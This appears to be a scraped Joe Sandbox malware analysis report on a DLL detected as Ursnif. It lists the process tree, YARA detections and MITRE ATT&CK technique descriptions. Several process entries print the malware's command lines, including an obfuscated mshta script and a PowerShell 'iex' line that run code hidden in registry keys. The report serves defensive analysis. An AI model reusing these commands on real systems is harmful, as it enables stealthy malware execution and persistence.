00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 2512 Parent PID: 5780

General

Start time:	20:25:11
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 5432 Parent PID: 5780

General

Start time:	20:25:11
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Imagebase:	0xee0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 4604 Parent PID: 2512

General

Start time:	20:25:12
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Imagebase:	0xee0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exe PID: 3752 Parent PID: 5780

General

Start time:	20:25:16
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Imagebase:	0xee0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2832 Parent PID: 5780

General

Start time:	20:25:20
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Imagebase:	0xee0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 68 Parent PID: 3472

General

Start time:	20:26:29
Start date:	03/08/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7786a0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 5708 Parent PID: 68

General

Start time:	20:26:31
Start date:	03/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 4948 Parent PID: 5708

General

Start time:	20:26:31
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 5644 Parent PID: 3472

General

Start time:	20:26:40
Start date:	03/08/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7786a0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exe PID: 1188 Parent PID: 5708

General

Start time:	20:26:41
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Imagebase:	0x7ff799ea0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 6052 Parent PID: 5644

General

Start time:	20:26:42
Start date:	03/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 1460 Parent PID: 6052

General

Start time:	20:26:43
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cvtres.exe PID: 5444 Parent PID: 1188

General

Start time:	20:26:43
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Imagebase:	0x7ff6a2490000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csc.exe PID: 4988 Parent PID: 5708

General

Start time:	20:26:49
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Imagebase:	0x7ff799ea0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: control.exe PID: 2224 Parent PID: 5780

General

Start time:	20:26:50
Start date:	03/08/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6f6e40000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, Author: Joe Security

Analysis Process: cvtres.exe PID: 4696 Parent PID: 4988

General

Start time:	20:26:51
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Imagebase:	0x7ff6a2490000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csc.exe PID: 3396 Parent PID: 6052

General

Start time:	20:26:51
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Imagebase:	0x7ff799ea0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cvtres.exe PID: 4968 Parent PID: 3396

General

Start time:	20:26:53
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Imagebase:	0x7ff6a2490000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csc.exe PID: 5516 Parent PID: 6052

General

Start time:	20:26:59
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Imagebase:	0x7ff799ea0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cvtres.exe PID: 4868 Parent PID: 5516

General

Start time:	20:27:00
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Imagebase:	0x7ff6a2490000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 3472 Parent PID: 2224

General

Start time:	20:27:02
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: control.exe PID: 5912 Parent PID: 4604

General

Start time:	20:27:05
Start date:	03/08/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6f6e40000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 5892 Parent PID: 5912

General

Start time:	20:27:12
Start date:	03/08/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6bbfa0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report worVoBJYGD.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
